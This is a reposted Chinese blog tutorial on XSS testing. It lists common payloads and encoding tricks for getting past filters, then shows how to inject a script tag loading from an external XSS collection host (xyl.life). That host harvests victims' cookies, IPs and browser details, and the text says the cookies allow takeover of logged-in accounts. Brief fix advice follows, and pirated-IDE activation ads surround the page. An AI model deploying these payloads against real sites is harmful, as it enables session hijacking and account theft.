xss平台使用方法_简单介绍一种你在家使用过的工具

xss平台使用方法_简单介绍一种你在家使用过的工具XSS常用语句及编码绕过XSS常用的测试语句有:<script>alert(1)</script><imgsrc=xonerror=alert(1)>&

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

XSS常用语句及编码绕过

XSS常用的测试语句有:

  • <script>alert(1)</script>
  • <img src=x onerror=alert(1)>
  • <svg onload=alert(1)>
  • <a href=javascript:alert(1)>
    常见的XSS的绕过编码有JS编码、HTML实体编码和URL编码

JS编码

JS提供了四种字符编码的策略,如下所示。

  • 三个八进制数字,如果个数不够,在前面补0,例如“e” 的编码为“\145” ;
  • 两个十六进制数字,如果个数不够,在前面补0,例如”e” 的编码为”\x65″ ;
  • 四个十六进制数字,如果个数不够,在前面补0,例如”e” 的编码为“\u0065”;
  • 对于一些控制字符,使用特殊的C类型的转义风格(例如和\r) 。

HTML实体编码

  • 命名实体:以&开头,以分号结尾的,例如”<“的编码是”<” 。
  • 字符编码:十进制、十六进制ASCII码或Unicode字符编码,样式为”&#数值;”,例如”<” 可以编码为 “<” 和”<“

URL编码

这里的URL编码,也是两次URL全编码的结果。如果alert被过滤,结果为%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34。
在使用XSS编码测试时,需要考虑HTML渲染的顺序,特别是针对多种编码组合时,要选择合适的编码方式进行测试。

使用XSS平台测试XSS漏洞

XSS在线平台
首先在XSS平台注册账并登录,单击”我的项目”中的“创建” 按钮,页面中的名称和描述是分类的,随意填写即可。
xss平台使用方法_简单介绍一种你在家使用过的工具

勾选“默认模块”选项后单击”下一步”按钮。这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。这里说明一下,注意上方的红框,这里最好是复制上方第一个红色方框中的内容,例如:<sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 这个就是项目给你的代码,这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。
xss平台使用方法_简单介绍一种你在家使用过的工具

这里还要说明一下,其实<sCRiPt sRC=//xyl.life/xxxx></sCrIpT>当网站前面是//的时候,代码会自动适配网站,如果对方网站是https的那么代码会自动从https加载,如果对方网站是http的那么代码会从http加载。所以,默认的这种方式是最好的插入方式。页面上显示了多种利用代码,在实际情况中, 一般会根据HTML源码选择合适的利用代码,以此构造浏览器能够执行的代码,这里选择第二种利用代码。
xss平台使用方法_简单介绍一种你在家使用过的工具

将利用代码插入到存在XSS漏洞的URL后,检查浏览器缓存加载文件。发现浏览器成功执行XSS的利用代码
xss平台使用方法_简单介绍一种你在家使用过的工具

然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。
回到XSS平台,可以看到我们已经获取了信息,其中包含来源地址、cookie、IP、 浏览器等,如果用户处于登录状态,可修改cookie并进入该用户的账户。

XSS漏洞修复建议

因为XSS漏洞涉及输入和输出两部分,所以其修复也分为两种。

  • 过滤输入的数据,包括 <>on* 等非法字符。
  • 对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/167844.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 详解Jvm内存结构

    详解Jvm内存结构近期在学习研究内存,那么Jvm内存结构和Jvm的内存模型即JMM(Javamomerymodel)这两项内容都是学习java虚拟机、java内存知识的基础。为了让自己加深理解,有不至于嵌入到底层细节太深,会通过一段代码片段类比到内存结构图中的真实呈现。一、Jvm体系的内存结构图JVM运行数据区,也就是我们所说的内存结构主要分为两个大区:1、线程共享区**方法区(MethodArea)????*存储运行时的常量池、被虚拟机加载过的类信息、常量、静态变量、即时编译器编译后的代码数据。**堆区(

  • linux .vimrc设置 tab设置

    linux .vimrc设置 tab设置一.仅设置当前用户的Tab键宽度输入命令:vim~/.vimrc然后:settabstop=4 //我这里将Tab键的宽度设置为4保存:ctrl+z+z(或:wq!)OK!二.设置所有用户的Tab键宽度输入命令:vim/etc/vimrc在vimrc文件的最后添加:settabstop=4保存:ctrl+z+z(或:wq!)OK!这样不管是哪个用…

  • 网站的域名带www的和不带www的有什么区别呀

    网站的域名带www的和不带www的有什么区别呀

    2021年10月25日
  • 阿里云配置二级域名

    阿里云配置二级域名阿里云配置二级域名打开https://www.aliyun.com/?utm_content=se_1000301881打开控制台找到域名列表—解析—添加记录记录类型A-主机记录:yy.xxx.cn//—-yy二级域名xxx一级域名解析线路:默认记录值:39.xx….

  • MyEclipse安装SVN插件[通俗易懂]

    MyEclipse安装SVN插件[通俗易懂]1.下载SVN插件下载地址:链接:https://pan.baidu.com/s/1SCB9U9VYUH9Rh9NzmzRERA提取码:9e9e下载完解压即可2.在MyEclipse中安装SVN插件1.找到MyEclipse在安装目录下的dropins文件夹2.在driopins文件夹内新建一个SVN文件夹3.将解压文件内的这两个文件夹复制到driopins文件夹下的SV…

  • C语言system的用法「建议收藏」

    C语言system的用法「建议收藏」C语言system的用法system()在头文件stdlib.h中system()是C语言中为了调用windows系统命令来设置。例:system(“cls”);//清屏system(“pause”);//暂停system(“title名字”);//设置窗口名system(“time/T”);//显示当前时间system(“data/T”);//显示当前日期system(“…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号